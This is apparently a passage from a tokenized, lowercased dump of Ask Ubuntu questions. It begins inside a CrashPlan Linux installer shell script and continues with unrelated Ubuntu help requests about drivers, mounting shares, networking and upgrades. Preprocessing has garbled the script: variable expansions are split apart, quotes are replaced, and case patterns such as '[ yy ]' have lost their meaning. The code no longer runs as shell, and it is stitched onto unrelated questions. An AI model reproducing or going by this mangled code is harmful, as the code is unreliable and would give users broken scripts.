runlvldir=/etc/rc $ { runlevel } .d src_user= $ { sudo_user } if [ `` x $ { src_user } '' == `` x '' ] ; then src_user= $ { user } fi username= '' `id -un` '' prepdir ( ) { if [ ! -d `` $ { 1 } '' ] ; then echo -n `` $ { 1 } does not exist . create $ 1 ? ( y/n ) [ y ] `` read yn_pd if [ `` x $ { yn_pd } '' == `` x '' ] ; then yn_pd=y fi if [ `` $ { yn_pd } '' == `` y '' ] ; then mkdir -p `` $ { 1 } '' if [ $ ? -ne 0 ] ; then echo `` failed to create $ { 1 } . please check your configuration . '' return 1 fi else echo `` please check your configuration . '' return 1 fi fi return 0 } promptforjvmdownload ( ) { echo -n `` would you like to download the jre and dedicate it to $ { app_basename } ? ( y/n ) [ y ] `` read javadl if [ `` x $ { javadl } '' == `` x '' ] ; then javadl=y fi if [ `` $ { javadl } '' == `` y '' ] ; then javacommon= '' download '' echo `` jre will be downloaded '' else echo `` '' echo `` we 're sorry , $ { app_basename } requires a valid sun jre or openjdk . please install one and then '' echo `` rerun this installer . exiting . '' exit 1 fi return 0 } # welcome- avoid printing duplicate messages if we 're recalling ourself if [ `` $ { 1 } '' ! = `` recall '' ] ; then echo `` '' echo `` welcome to the $ { app_basename } installer . '' echo `` '' echo -n `` press enter to continue with installation. `` read enter # basic requirements - echo `` '' echo `` validating environment ... '' fi # basic requirements if [ `` $ { username } '' ! = `` root '' ] ; then echo `` '' echo `` note : you are apparently not installing as root . while it is recommended to '' echo `` install as root it is not required . if you continue to install as $ { username } '' echo `` then $ { app_basename } will only be able to back up files readable by $ { username } . '' echo `` '' echo -n `` would you like to switch users and install as root ? ( y/n ) [ y ] `` read yn if [ `` x $ { yn } '' == `` x '' ] ; then yn=y fi if [ `` $ { yn } '' == `` y '' ] ; then echo `` switching to root '' sudo $ { 0 } recall exit 0 else echo `` installing as current user '' targetdir= $ { home } / $ { dir_basename } binsdir= manifestdir= $ { targetdir } /manifest initdir= runlvldir= fi else echo `` detected root permissions '' fi # =============================================================================== # validate the environment by verifying that all necessary binaries are present # =============================================================================== for bin in $ reqdbins ; do bin_path=`which $ bin 2 > /dev/null` if [ [ $ ? ! = 0 ] ] ; then echo `` error : $ bin not found and is required for install . exiting '' exit 1 fi done # echo `` '' # =============================================================================== # continue validation by verifying the existence of a supported java vm # =============================================================================== javacommon=`which java` if [ [ $ ? ! = 0 ] ] ; then echo `` no java vm could be found in your path '' promptforjvmdownload fi # setup archive var to point to the cpio archive . this will be used here to extract what we need # to execute the java comparison below and will be used later by the script to # actually extract everything . archive=`ls ./*_*.cpi` if [ [ $ javacommon ! = `` download '' ] ] ; then # evaluate the java environment mkdir ./lib cat $ archive | gzip -dc - | cpio -i -- no-preserve-owner ./lib/com.backup42.desktop.jar $ javacommon -classpath ./lib/com.backup42.desktop.jar com.code42.utils.javaenvironment > /tmp/foo.sh source /tmp/foo.sh rm /tmp/foo.sh rm -rf ./lib # check the java version to make sure we have something workable javavercheck=0 for candidate in $ okjava ; do if [ [ $ candidate == $ java_specification_version ] ] ; then javavercheck=1 fi done if [ [ $ javavercheck -eq 0 ] ] ; then echo `` the current version of java ( $ java_specification_version ) is incompatible with $ app_basename . '' echo `` please install one of the following version of the sun jre or openjdk : $ okjava '' exit 1 fi # make sure we 've got either hotspot or openjdk echo $ java_vm_name | grep openjdk > /dev/null 2 > & 1 is_openjdk= $ ? echo $ java_vm_name | grep hotspot > /dev/null 2 > & 1 is_hotspot= $ ? if [ [ ! ( $ is_openjdk || $ is_hotspot ) ] ] ; then echo `` '' echo `` the current installed version of java is not supported . '' echo `` $ app_basename requires the sun jre or openjdk . '' exit 1 fi fi echo `` '' echo `` you must review and agree to the eula before installation . '' echo `` '' echo -n `` press enter to read the eula. `` read enter # eula time more ./eula.txt agreed=0 while [ `` $ { agreed } '' == `` 0 '' ] ; do echo `` '' echo -n `` do you accept and agree to be bound by the eula ? ( yes/no ) `` read reply case $ { reply } in [ yy ] | [ yy ] [ ee ] [ ss ] ) agreed=1 ; ; [ nn ] | [ nn ] [ oo ] ) echo `` if you do not agree to the license then $ { app_basename } may not be installed . exiting . `` ; exit 1 ; ; esac done interview=0 while [ $ { interview } == 0 ] ; do interviewsub=0 while [ $ { interviewsub } == 0 ] ; do echo `` '' echo -n `` what directory do you wish to install $ { app_basename } to ? [ $ { targetdir } ] `` read targetdir_x if [ `` x $ { targetdir_x } '' ! = `` x '' ] ; then targetdir= $ { targetdir_x } manifestdir= $ { targetdir } /manifest fi prepdir `` $ { targetdir } '' if [ $ ? == 0 ] ; then interviewsub=1 fi done if [ `` $ { username } '' == `` root '' ] ; then interviewsub=0 while [ $ { interviewsub } == 0 ] ; do echo `` '' echo -n `` what directory do you wish to link the $ { app_basename } executable to ? [ $ { binsdir } ] `` read binsdir_x if [ `` x $ { binsdir_x } '' ! = `` x '' ] ; then binsdir= $ { binsdir_x } fi prepdir $ { binsdir } if [ $ ? == 0 ] ; then interviewsub=1 fi done fi interviewsub=0 while [ $ { interviewsub } == 0 ] ; do echo `` '' echo -n `` what directory do you wish to store backups in ? [ $ { manifestdir } ] `` read manifestdir_x if [ `` x $ { manifestdir_x } '' ! = `` x '' ] ; then manifestdir= $ { manifestdir_x } fi prepdir $ { manifestdir } if [ $ ? == 0 ] ; then interviewsub=1 fi done if [ `` $ { username } '' == `` root '' ] ; then interviewsub=0 while [ $ { interviewsub } == 0 ] ; do echo `` '' echo -n `` what directory contains your sysv init scripts ? [ $ { initdir } ] `` read initdir_x if [ `` x $ { initdir_x } '' ! = `` x '' ] ; then initdir= $ { initdir_x } fi prepdir $ { initdir } if [ $ ? == 0 ] ; then interviewsub=1 fi done interviewsub=0 while [ $ { interviewsub } == 0 ] ; do echo `` '' echo -n `` what directory contains your runlevel init links ? [ $ { runlvldir } ] `` read runlvldir_x if [ `` x $ { runlvldir_x } '' ! = `` x '' ] ; then runlvldir= $ { runlvldir_x } fi prepdir $ { runlvldir } if [ $ ? == 0 ] ; then interviewsub=1 fi done fi echo `` '' echo `` your selections : '' echo $ { app_basename } will install to : $ { targetdir } if [ `` $ { username } '' == `` root '' ] ; then echo and put links to binaries in : $ { binsdir } fi echo and store datas in : $ { manifestdir } if [ `` $ { username } '' == `` root '' ] ; then echo your init.d dir is : $ { initdir } echo your current runlevel directory is : $ { runlvldir } fi echo `` '' echo -n `` is this correct ? ( y/n ) [ y ] `` read yn if [ `` x $ { yn } '' == `` x '' ] ; then yn=y fi if [ `` $ { yn } '' == `` y '' ] ; then interview=1 fi done # install time =============================================== echo `` '' # is crashplan already there ? if [ -f $ { targetdir } /install.vars ] ; then echo `` crashplan appears to already be installed in the specified location : '' echo `` $ { targetdir } '' echo `` please uninstall and then try this install again . '' exit 1 fi # create a file that has our install vars so we can later uninstall echo `` '' > $ { targetdir } /install.vars echo `` targetdir= $ { targetdir } '' > > $ { targetdir } /install.vars echo `` binsdir= $ { binsdir } '' > > $ { targetdir } /install.vars echo `` manifestdir= $ { manifestdir } '' > > $ { targetdir } /install.vars echo `` initdir= $ { initdir } '' > > $ { targetdir } /install.vars echo `` runlvldir= $ { runlvldir } '' > > $ { targetdir } /install.vars now=`date + % y % m % d` echo `` installdate= $ now '' > > $ { targetdir } /install.vars cat $ { script_dir } /install.defaults > > $ { targetdir } /install.vars # keep track of the processor architecture parch=`uname -m` # download java if [ [ $ javacommon == `` download '' ] ] ; then if [ [ $ parch == `` x86_64 '' ] ] ; then jvmurl= '' http : // $ { download_host } /linuxjvm/jre1.6.0_25_x64.tgz '' else jvmurl= '' http : // $ { download_host } /linuxjvm/jre1.6.0_25_i586.tgz '' fi jvmfile=`basename $ { jvmurl } ` if [ [ -f $ { jvmfile } ] ] ; then echo `` '' echo `` download of the jvm found . we 'll try to use it , but if it 's only a partial '' echo `` copy of the file then this will fail . if that happens please remove the file '' echo `` and try again . '' echo `` jre archive : $ { jvmfile } '' echo `` '' else # start by looking for wget wget_path=`which wget 2 > /dev/null` if [ [ $ ? == 0 ] ] ; then echo `` downloading the jre using wget '' $ wget_path $ jvmurl if [ [ $ ? ! = 0 ] ] ; then echo `` unable to download jre ; please check network connection '' exit 1 fi else curl_path=`which curl 2 > /dev/null` if [ [ $ ? == 0 ] ] ; then echo `` downloading the jre using curl '' $ curl_path $ jvmurl -o `basename $ jvmurl` if [ [ $ ? ! = 0 ] ] ; then echo `` unable to download jre ; please check network connection '' exit 1 fi else echo `` could not find wget or curl . you must install one of these utilities '' echo `` in order to download a jvm '' exit 1 fi fi fi here=`pwd` cd $ { targetdir } # extract into ./jre tar -xzf `` $ { here } / $ { jvmfile } '' cd `` $ { here } '' echo `` javacommon= $ { targetdir } /jre/bin/java '' > > $ { targetdir } /install.vars echo `` java installed . '' else echo `` javacommon= $ { javacommon } '' > > $ { targetdir } /install.vars fi # definition of archive occurred above when we extracted the jar we need to evaluate java environment echo unpacking $ { here } / $ { archive } ... here=`pwd` cd $ { targetdir } cat `` $ { here } / $ { archive } '' | gzip -d -c - | cpio -i -- no-preserve-owner cd `` $ { here } '' # custom ? if [ -d .custom ] ; then echo copying .custom to $ { targetdir } cp -rp .custom `` $ { targetdir } '' fi if [ -d custom ] ; then echo copying custom to $ { targetdir } cp -rp custom `` $ { targetdir } '' fi if [ -d custom ] ; then echo copying custom to $ { targetdir } cp -rp custom `` $ { targetdir } '' fi # update the configs for file storage if grep `` < manifestpath > . * < /manifestpath > '' $ { targetdir } /conf/default.service.xml > /dev/null then sed -i `` s| < manifestpath > . * < /manifestpath > | < manifestpath > $ { manifestdir } < /manifestpath > |g '' $ { targetdir } /conf/default.service.xml else sed -i `` s| < backupconfig > | < backupconfig > \n\t\t\t < manifestpath > $ { manifestdir } < /manifestpath > |g '' $ { targetdir } /conf/default.service.xml fi # the log dir logdir= $ { targetdir } /log chmod 777 $ logdir # desktop init script guiscript= $ { targetdir } /bin/ $ { app_basename } desktop cp scripts/ $ { app_basename } desktop $ { guiscript } chmod 755 $ { guiscript } # sed -imod `` s|targetdir= . *|targetdir= $ { targetdir } | '' $ { guiscript } & & rm -rf $ { guiscript } mod # link to bin if appropriate if [ `` x $ { binsdir } '' ! = `` x '' ] ; then ln -s $ { guiscript } $ { binsdir } / $ { app_basename } desktop fi # install the control script for the service initscript= $ { targetdir } /bin/ $ { app_basename } engine cp scripts/ $ { app_basename } engine $ { initscript } cp scripts/run.conf $ { targetdir } /bin chmod 755 $ { initscript } # install the init script and modify it by applying variables currently defined in this context # if the user is not installing as root then we install into the bin directory only . init_install_dir= $ { targetdir } /bin if [ `` x $ { initdir } '' ! = `` x '' ] ; then init_install_dir= $ { initdir } fi # perform substitution on the init script ; we need to make the value of initscript available # to what lives in /etc/init.d sedexprsub=`echo $ initscript | sed 's/\//\\\\\//g'` sedexpr= '' s/ < initscript > / $ sedexprsub/g '' sed $ sedexpr scripts/ $ { dir_basename } > $ { init_install_dir } / $ { dir_basename } chmod 755 $ { init_install_dir } / $ { dir_basename } if [ `` x $ { runlvldir } '' ! = `` x '' ] ; then # now that we should have a working init script let 's link in the runlevel scripts ln -s $ { init_install_dir } / $ { dir_basename } $ { runlvldir } /s99 $ { dir_basename } fi # copy the desktop launcher into place if [ -d `` /home/ $ { src_user } /desktop '' ] ; then desktop_launcher= '' /home/ $ { src_user } /desktop/ $ { app_basename } .desktop '' # which icon are we using ? custom if it exists desktop_icon_path= $ { targetdir } /skin/icon_app_128x128.png if [ -f $ { targetdir } /skin/custom/icon_app_64x64.png ] ; then desktop_icon_path= $ { targetdir } /skin/custom/icon_app_64x64.png fi if [ -f $ { targetdir } /skin/custom/icon_app_128x128.png ] ; then desktop_icon_path= $ { targetdir } /skin/custom/icon_app_128x128.png fi # use 'su ' only if we 're operating as root if [ `` $ { username } '' == `` root '' ] ; then su $ { src_user } -c `` cp scripts/ $ { app_basename } .desktop $ { desktop_launcher } '' su $ { src_user } -c `` chmod +x $ { desktop_launcher } '' su $ { src_user } -c `` sed -imod \ '' s|exec= . *|exec= $ { guiscript } |\ '' $ { desktop_launcher } & & rm -rf $ { desktop_launcher } mod '' su $ { src_user } -c `` sed -imod \ '' s|icon= . *|icon= $ { desktop_icon_path } |\ '' $ { desktop_launcher } & & rm -rf $ { desktop_launcher } mod '' else cp scripts/ $ { app_basename } .desktop $ { desktop_launcher } chmod +x $ { desktop_launcher } sed -imod `` s|exec= . *|exec= $ { guiscript } | '' $ { desktop_launcher } & & rm -rf $ { desktop_launcher } mod sed -imod `` s|icon= . *|icon= $ { desktop_icon_path } | '' $ { desktop_launcher } & & rm -rf $ { desktop_launcher } mod fi fi # check for max_user_watches and suggest updating if necessary . many distros use 8192 by default # so we use this value as a baseline . inotify_watches=`cat /proc/sys/fs/inotify/max_user_watches` if [ [ $ inotify_watches -le 8192 ] ] ; then echo `` '' echo `` your linux system is currently configured to watch $ inotify_watches files in real time . '' echo `` we recommend using a larger value ; see the crashplan support site for details '' echo `` '' fi # start the servce $ { initscript } start # call out the `` service has been started '' by creating a pause echo `` '' echo `` $ { app_basename } has been installed and the service has been started automatically . '' echo `` '' echo -n `` press enter to complete installation. `` read enter echo `` '' echo `` important directories : '' echo `` installation : '' echo `` $ { targetdir } '' echo `` logs : '' echo `` $ { targetdir } /log '' echo `` default archive location : '' echo `` $ { manifestdir } '' # if we installed as root make sure they see 'sudo ' in front of the engine start sudo_prefix= '' sudo `` if [ `` $ { username } '' ! = `` root '' ] ; then sudo_prefix= '' '' fi echo `` '' echo `` start scripts : '' echo `` $ { sudo_prefix } $ { initscript } start|stop '' echo `` $ { guiscript } '' echo `` '' echo `` you can run the $ { app_basename } desktop ui locally as your own user or connect '' echo `` a remote desktop ui to this service via port-forwarding and manage it '' echo `` remotely . instructions for remote management are in the readme files '' echo `` placed in your installation directory : '' echo `` $ { targetdir } /doc '' echo `` '' if [ `` x $ { display } '' ! = `` x '' ] ; then echo -n `` would you like to start $ { app_basename } desktop ? ( y/n ) [ y ] `` read reply if [ `` x $ { reply } '' == `` x '' ] ; then reply=y fi case $ { reply } in [ yy ] | [ yy ] [ ee ] [ ss ] ) # use 'su ' only if we 're operating as root if [ `` $ { username } '' == `` root '' ] ; then su $ { src_user } -c `` $ { guiscript } '' else $ { guiscript } fi ; ; esac fi echo `` '' echo `` to start the desktop ui : '' if [ `` x $ { binsdir } '' ! = `` x '' ] ; then echo `` $ { binsdir } / $ { app_basename } desktop '' else echo `` $ { guiscript } '' fi echo `` '' echo `` installation is complete . thank you for installing $ { app_basename } for linux . '' echo `` ''
366525	idm-like softwares in ubuntu	earlier i was using windows 7 . it was having idm ( internet download manager ) from which i was able to download almost all the types of files from the internet . i was also able to download online streaming videos by the help of idm . it was really helpful for me regarding the downloading . i was also able to resume my downloads which were paused or stopped due to some reason . so , i would like to ask that whether there is any software in ubuntu form which i could get these functions and if there is any software , then how to download it . i am a new user in ubuntu . i am using kubuntu 13.04 .
366527	can i format a pendrive after making it bootable	if i make a pendrive bootable with ubuntu 13.10 , after installing can i format the pendrive and use it like before as a storage device ?
366528	speakers and headphones play at the same time . lenovo thinkpad	ubuntu 12.04 lts . they worked fine until just a couple hours ago , and i see the other threads but they do n't have solutions . none of 20 i must have looked at . i looked at alsamixer , but there is no auto-mute option . no matter how many times i hit the right arrow key . muting the speakers mutes both the headphones and the speakers . my headphones do not show up in the sound settings output . any way to mute the speakers without muting the headphones would be appreciated . the speakers do n't have to unmute when i unplug the headphones . not physically breaking the speakers , but it might come to that . i wo n't be able to follow instructions that are n't explicit , sorry . thanks for anyone 's time .
366530	ubuntu phone support for my device	i want to use ubuntu in my phone `` htc mozart 7 '' and tab `` sony tablet s '' . please help me .
366531	`` could not connect to wicd 's d-bus interface . check the wicd log for error messages . ''	i am currently making use of a wired broadband . by default networkmanager shows that the auto ethernet is connected . i was unable to browse through any websites in the browser . i had to disconnect & connect the auto ethernet several times in networkmanager or restart ubuntu to get it fixed . but following these steps is quiet annoying as this issue happens very frequently . i browsed through the internet and got to know that wicd network manager fixes this issue . earlier i have been using ubuntu 12.04 where the same issue was fixed by making use of wcid network manager . recently i upgraded to 13.10 and as i got the same network issue in default networkmanager , i have installed wicd networkmanager but when i try to open wcid , i get an alert message saying , could not connect to wicd 's d-bus interface . check the wicd log for error messages . when i click on ok , i get the same message again and when i click on ok again i get the following message , error connecting to wicd service via d-bus . please ensure the wicd service is running . any help to fix this issue is greatly appreciated as this issue was annoying me since i installed 13.10
366534	macbook pro black screen on install 13.10	i 've tried booting via bios emulation and efi with the anti card turned off but either way i end up with a black screen . efi hangs after the kububtu splash creeen and bios hangs shortly after grub . any ideas ?
366536	google chrome will not exit fullscreen mode	i am running 64-bit ubuntu 13.10 , have latest stable google-chrome version 30.0.1599.114-1 . whenever i enter fullscreen mode by pressing f11 , it would not allow me to exit this mode by pressing f11 . actually , i see it exit but then fullscreen mode is quickly restored . i searched for a solution , but nothing really helps . i even tried completely re-installing it with no luck . any suggestions ? update : i tried completely removing ~/.config/google-chrome , it did not help . update 2 : i am running cinnamon 2.0.6 , maybe that would give some clues . update 3 : i have chromium 29.0.1547.65 , and it does not have this issue . thanks , nick .
366537	hidden encrypted os	i have never used ubuntu but want to migrate from windows . is there a way to setup a hidden encrypted os on ubuntu as truecrypt can do with windows os ? ( in the case as suggested by truecrypt where you are forced to reveal your password and so want a fake os that you can reveal while your real os remains hidden ) . thanks , phil
366545	package 'openbsd-inetd ' has no installation candidate	when i try to install openbsd-inetd , it shows root @ amsys-g41mt-s2pt : /home/amsys # sudo apt-get install openbsd-inetd reading package lists ... done building dependency tree reading state information ... done package openbsd-inetd is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'openbsd-inetd ' has no installation candidate what is meaning of e : package 'openbsd-inetd ' has no installation candidate ?
366551	firewall blocking mysql port	i am trying to connect to mysql through node.js program but it throwing an error . i am not able to connect to mysql on port 3306 . i already have apache installed on my pc . i have tried http : //www.cyberciti.biz/tips/linux-iptables-18-allow-mysql-server-incoming-request.html but still it is not working . error : error : connect econnrefused at errnoexception ( net.js:901:11 ) at object.afterconnect [ as oncomplete ] ( net.js:892:19 ) -- -- -- -- -- -- -- -- -- -- at handshake.sequence ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/protocol/sequences/sequence.js:15:20 ) at new handshake ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/protocol/sequences/handshake.js:9:12 ) at protocol.handshake ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/protocol/protocol.js:42:50 ) at connection.connect ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/connection.js:72:18 ) at connection._implyconnect ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/connection.js:182:10 ) at connection.query ( /opt/lampp/htdocs/1nodeapp/node_modules/mysql/lib/connection.js:97:8 ) at server. < anonymous > ( /opt/lampp/htdocs/1nodeapp/mysql.js:22:18 ) at server.eventemitter.emit ( events.js:98:17 ) at httpparser.parser.onincoming ( http.js:2108:12 ) at httpparser.parseronheaderscomplete [ as onheaderscomplete ] ( http.js:121:23 )
366552	changing keyboard language problem in 12.10	i want to change the shortcut of changing language of the keyboard , but when i set alt+shift as shortcut , it set as `` disabled '' .
366554	after upgrading from 13.04 to 13.10 i get a black screen ( ubuntu )	after upgrading my 13.04 vm to 13.10 when i run my 13.10 vm all i get is a black screen with flashing _. i can alt f1-f6 to get into tty1-6 and i ran apt-get update & upgrade but still no luck.. when i try to run gui apps from the tty1 it states that gtkwarning : could not open display . and when i type unity the error says no display variable set , setting it to :0 unity-panel-service : no process found can someone help me to get unity working again ? the link you gave me did not fix the problem and since this is virtual machine i dunno which video card it is using
366556	13.10 xrdp problem with gnome-fallback	i have an issue with xrdp being unable to display gnome fallback session in 13.10 - connection works fine but everything i get is xserver grey screen and x cursor . my hardware config is ati hdmi with dual display on ati drivers . what i have done until now : installed xrdp ( no tightvnc ) , gnome-session-fallback from terminal . created .xsession file in my home dir : gnome-session -- session=gnome-fallback restarted xrdp several times , restarted ubuntu at the moment file is owned by the user i am trying to connect as and has executable privilegs . what i get after connection from windows 8.1 laptop is xserver grey desktop and no chance to play . .xsession-errors says : xsession : xsession started for at ... . x error of failed req : badvalue ( integer param out of range ) major opcode for failed req : 109 ( x_changehosts ) value in failed req : 0x5 ... gnome-session-is-accelerated : no composite extension gnome-session-check-accelerated : helper exited with code 256 gnome-session-is-accelerated : no composite extension gnome-session-check-accelerated : helper exited with code 256 i have already reinstalled system like 20 time to solve some issues but being unable to rdp is a no go for me . when i installed xfce4 it was working fine . what 's wrong with my gnome-fallback ?
366557	to make swap partition at least as large as the amount of memory ( ram )	how to make swap partition at least as large as the amount of memory ( ram ) in ubuntu 13.04 this i need to do to enable hibernation using tuxonice method
366559	automaticaly add virtual hosts in ubuntu	i want to create a simple web interface with username , password and domain . once the users gives the information , a script will be executed creating the host with the name that the user has given and give permissions to access phpmyadmin , upload a file with filezilla . i use ubuntu , with apache and mysql installed . i found many web based interfaces and tutorials how to manually create virtual hosts but i want an automated self made solution . can anyone help me ? thanks in advance
366563	i 'm trying to mount a hidden partition but i ca n't get the right output	i did sudo fdisk -l yet i got the following . units = sectors of 1 * 512 = 512 bytes instead of something on the lines of ... . units = cylinders of 16065 * 512 = 8225280 bytes this is what i 'm trying to achieve .
366566	how to configure up arrow to search the history ?	how can i configure the ↑ key to get commands from history ? example : if i type p and press ↑ then it should only show commands in the history starting with `` p '' like python , php , perl , etc . please can anyone help me to configure this feature ? i 've edited .bashrc , but it does n't work for me .
366567	dropbox captures the internet	i recently installed dropbox on my computer.the problem is that when dropbox is syncing i.e . uploading or downloading no i can not use internet on my other programs like firefox . on the other hand this does not happen in linux mint ( cinnamon ) 15 or windows 8 which is installed on the same computer . not only this any other computer connected to the same wifi router , their internet is diabled too . the current system on my computer kubuntu 13.10 32bit version , i recently upgraded from version 13.04 . i asked the support team of dropbox and this was their reply . `` hi mazhar , thanks for contacting dropbox . unfortunately dropbox can only upload and download as fast as your internet service provider ( isp ) allows . consumer isp 's normally provide 1/10th the upload speed compared to download speed . normally dropbox does n't use all of your bandwidth , just to be polite . however , you can change that by manually setting the upload/download speed : right click the dropbox icon in the system tray at the bottom right of your screen , by the clock on windows or menu bar at the top of your screen on linux . click on the gear icon in the notifications panel and select `` preferences '' from the menu click the `` network '' tab click change settings next to bandwidth : set the upload and download to a specific kb/s limit if you know your connection speed or simply do n't limit to allow dropbox to use as much bandwidth as possible . note : setting your upload to do n't limit or a higher number than your connection is capable of will likely cause all other internet activity on your network to slow significantly . unfortunately this did not not help.please solve this problem .
366572	ethernet stopped working	i recently ran the updates in ubuntu 13.04 . and after running the updates , i am not able to connect to wired network . my wireless network works just fine . what steps should i follow to get the wired network working again ?
366578	start asus laptop ux32vd with keyboard backlight off	i 'd like a way to set the default keyboard backlight state to `` off '' . i 'm running ubuntu 13.04 on an asus zenbook ux32vd . all the function keys work , but currently i have to turn off the keyboard backlight by pressing fn+f5 several times every time i boot up the computer . this is a minor annoyance i 've often wanted to know how to avoid . is there any way to set the keyboard backlight to be in the off state when the computer turns on ?
366580	nvidia 740m still not working after bumblebee installation	first of all , i have checked a lot of similar topics , but i still ca n't get my laptop to use nvidia 740m . so first things first . i have a laptop asus x550v ( i5-3230 , 4gb ram , nvidia 740m + intel hd4000 ) . i installed ubuntu 13.10 alongside win8 ( preinstalled ) and both systems are running without problems . however , i have problem with second graphic card ( nvidia 740m ) , as ubuntu does n't recognize it . i installed bumblebee with this tutorial https : //wiki.ubuntu.com/bumblebee # installation , but i still get error `` can not access secondary gpu '' error when trying to run ''optirun steam '' in terminal . then i tried to do this : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . you need to edit the /etc/bumblebee/xorg.conf.nvidia ( or /etc/bumblebee/xorg.conf.nouveau if using the noveau driver ) and specify the correct busid by following the instructions therein . but with lspci / vga i get only info about intel 4000 , but no nvidia . when i type only lspci , i get the line for nvidia 740m , but after i edit the config file i still get second card error . also , in /etc/bumblebee/xorg.conf.nvidia there was n't busid or anything similar , so i just added the whole line in device section . as i sad , i tried a lot of things to get it working , avoiding this forum ( as i di n't want to bother people with some solutions possible ) , but alas ! , i had to bother you . if there is a need for some additional info , just say , no problem at all . thank you very much in advance . : )
366581	keytouch package is missing in ubuntu 13.10	keytouch missing in database for ubuntu 13.10 . how can it be installed in ubuntu 13.10 for microsoft office keyboard support ?
366582	mount smb / afp 13.10	i can not seem to get ubuntu to mount a mac share via smb or afp . i 've tried the following ... afp : apt-get install afpfs-ng-utils mount_afp afp : //user : password @ localip/share /mnt/share error given : `` could not connect , never got a reponse to getstatus , connection timed out '' . which is odd as i can access the share just fine via mac . smb : apt-get install cifs-utils nano /etc/fstab added the following line `` //localip/share /mnt/share cifs username=user , password=pass , iocharset=utf8 , sec=nltm 0 0 '' mount -a error given : root @ asrock : ~ # mount -a -vvv mount : fstab path : `` /etc/fstab '' mount : mtab path : `` /etc/mtab '' mount : lock path : `` /etc/mtab~ '' mount : temp path : `` /etc/mtab.tmp '' mount : uid : 0 mount : euid : 0 mount : spec : `` //10.0.1.3/nas '' mount : node : `` /mnt/nas '' mount : types : `` cifs '' mount : opts : `` username=user , password=pass , iocharset=utf8 , sec=nltm '' mount : external mount : argv [ 0 ] = `` /sbin/mount.cifs '' mount : external mount : argv [ 1 ] = `` //10.0.1.3/nas '' mount : external mount : argv [ 2 ] = `` /mnt/nas '' mount : external mount : argv [ 3 ] = `` -v '' mount : external mount : argv [ 4 ] = `` -o '' mount : external mount : argv [ 5 ] = `` rw , username=user , password=pass , iocharset=utf8 , sec=nltm '' mount.cifs kernel mount options : ip=10.0.1.3 , unc=\\10.0.1.3\nas , iocharset=utf8 , sec=nltm , user=user , pass=* mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i do n't really care which it uses i just want it to work ! am i doing something wrong ?
366586	update to 13.10 and mixed-up linux headers ( kernel : 3.8.0-32-generic , headers : 3.11.0-12-generic )	i 've updated to 13.10 from 13.04 and i 've problem with linux headers . this is the kernel version : uname -a linux xxx-dell 3.8.0-32-generic # 47-ubuntu smp tue oct 1 22:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/li and those are installed headers : dpkg -l | grep headers linux-headers-3.11.0-12 3.11.0-12.19 linux-headers-3.11.0-12-generic 3.11.0-12.19 i 've tried to install headers for 3.8 , but this ends with error : sudo apt-get install linux-headers-3.8.0-32-generic reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.8.0-32-generic is not available , but is referred to by another package . how can i download matching headers to my kernel ? is is possible that upgrade process did not update to last kernel version ?
366587	how to install viber on ubuntu 13.10 , 32bit	i hope everyone is ok i would like to know if someone knows how to install viber on ubuntu 13.10 , 32 bit . best regards ,
366588	dualboot - windows 8 and ubuntu 13.10	i want to install ubuntu alongside the windows 8 . i have ideapad u410 with 500 gb hdd and 24 gb ssd for fast boot . i do n't have install dvd so i do n't want mess up my system . is better to install it on paration made in windows or is better to install it with `` install alongside windows 8 '' ? i have heard that there are problems with boot ( uefi , grub ) . what i schould do to install ubuntu properly alongside windows 8 ? how i must install ubuntu to boot windows 8 and ubuntu without problems ? thanks for your answers !
366592	how to get d-link dwa-547 working on ubuntu 13.10 ?	i got a d-link dwa-547 wifi card which is supposed to work out-of-the-box with linux . says so here : http : //wireless.kernel.org/en/users/drivers/ath9k/products/external while lspci does list the device , networkmanager does n't seem to allow me to configure wifi . lsmod also shows that ath9k is n't loaded . manually loading with 'modprobe ath9k ' does n't help . how do i get this card working on ubuntu 13.10 64-bit ?
366593	how to install lib32 on ubuntu 13.10 64bit	i install the ubuntu gnome 13.10 64bit on my computer yesterday . sudo apt-cache search ia32 , there is no ia32-libs . could you help to tell me how to install that on ubuntu 13.10 ? thx for your help !
366596	unity desktop displays strange lines	did n't quite know what title to give this problem , but hopefully the screenshot will explain more . i am running a samsung r60+ laptop on ubuntu 13.10 with a radeon x1250 gpu . after i login and the unity desktop shows , i can see these strange lines at the top of the screen . i presumed it was perhaps a driver issue and found this article to see if i could resolve the issue : https : //help.ubuntu.com/community/radeondriver i can not get on with unity at all ( where are all of the menus gone ! ) so perhaps reverting back to gnome may be a solution in my case ? i 'd welcome any ideas please .
366598	ubuntu 13.xx unable to mount usb hdd . tried everything . i/o error boot sector/file system	i know that there are many posts related but none of them helped me . i will jump to the last test because it is the one that should work , but it does not . an external hdd with single partition slow ntfs formatted in windows , empty and clean . checked for errors , it tells that not errors where found . moving to ubutnu 13.04 ... gparted throws the first error when trying to read the disk : input/output error it appears as unknown the content of the disk . unable to create partition table or format it , getting the same error when trying . if i try to mount it in the terminal it tells me the same , specifying that also there is an i/o error reading the boot sector . i have this problem since i upgraded ( always with fresh install ) to 13.04 . i thought it will be solved by the 13.10 but it has the same behavior . i tried with two different hdd ( hd and sshd ) that work perfectly in windows 7 . in 13.04 at least i got a trying of mounting where the icon of the drive started showing and disappearing until finally it disappeared . but now it does n't even try . possible causes : -the hdd was my old main hdd , so it had win , recovery , system , ubu , swap partitions . maybe the way or place where the partition table is defined is not the best for an external hdd but i do n't know a lot in that topic . i would appreciate a lot if someone can give me a guideline to convert one of these hdd in a working external hdd . no files to recover , nothing to care about . just format completely the disk and be able to use it for storing backups without having to move the files first to the windows partition , load windows and then copy them to the external hdd . because i want to use a file comparator for the backups . thanks a lot edit 1 : i found an option in windows to convert it to a dynamic hdd that warns me that i wont be able to run o.s . after changing . i suppose that is what i need because in the current mode i can not safely extract it . but it tells me an error that it could n't change the mode . edit 2 : ntfs-3g is already installed . i also tried to connect the hdd back into the laptop , used the live cd of 13.10 with gparted to restore partition table and create new ntfs partition . same result when connecting back with the usb . no problems mounting the windows partition in my laptop 's hd . just with external hard drives i get the errors .
